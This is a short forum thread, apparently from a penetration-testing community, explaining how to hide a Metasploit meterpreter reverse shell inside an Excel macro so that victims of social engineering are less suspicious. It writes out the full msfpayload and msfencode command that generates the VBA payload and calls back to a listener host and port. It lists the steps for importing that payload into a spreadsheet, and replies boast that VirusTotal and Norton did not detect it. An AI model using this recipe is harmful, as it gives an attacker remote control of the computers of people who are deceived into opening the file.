Alternate filetype for SE to get reverse meterpreter session
Someone here was looking for non-exe type file (jpg?) so that the victim is less suspicious while running them. Well, an excel file may be the solution. :)
1. BT3 with msf v3.3
2. M$ office 2002 SP3 in a vista box
First, I generated a VBA code in a konsole in BT3 box:
I transferred the file to Windows, then, created an excel document, AND Tools>Macro>Visual Basic Editor. From the File>Import File>Browsed to the .cls file.
./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=7777 R | ./msfencode -b '' -t vba >> /root/Desktop/meterpreter.cls
PS: Virustotal scans the excel file as clean. Can somebody check with Norton AV please...
Scanned with Norton AV 2008
So i created the file and scanned it using Norton AV 2008 running version 18.104.22.168 fully patched.(This is one of the newest versions). No threat was detected :P!! Hope this helps... :D